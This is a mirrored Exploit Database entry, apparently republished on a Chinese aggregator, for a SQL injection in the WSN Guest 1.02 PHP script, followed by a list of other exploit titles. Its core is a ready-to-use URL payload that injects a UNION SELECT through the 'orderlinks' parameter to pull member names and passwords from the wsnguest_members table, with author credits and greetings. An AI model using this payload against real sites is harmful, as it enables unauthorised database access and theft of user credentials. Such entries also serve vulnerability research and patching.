WSN Guest 1.02 – ‘orderlinks’ SQL Injection

Exploit Database
9 阅读

作者： Gamoscu

日期： 2010-02-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11436/

###########################
Author: Gamoscu
Homepage: http://www.1923turk.com
Blog: http://gamoscu.wordpress.com/
Script: WSN Guest 1.02
Download: http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################

Exploat:index.php?page=20&orderlinks=SQL
 



http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--



############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

Veda Turlarý :)

last Exploits
WSN Guest 1.02 – ‘orderlinks’ SQL Injection的更多信息

New-CMS – Local File Inclusion：
Veeam ONE Reporter 9.5.0.3201 – Persistent Cross-site Scripting (Add/Edit Widget)：
Mantis Bug Tracker 1.2.3 – ‘db_type’ Cross-Site Scripting / Full Path Disclosure：
Drupal Module CAPTCHA – Security Bypass：
FRticket Ticket System – Persistent Cross-Site Scripting：
OV3 Online Administration 3.0 – Directory Traversal：
ICJobSite 1.1 – ‘pid’ SQL Injection：
Jinja2 2.10 – ‘from_string’ Server Side Template Injection：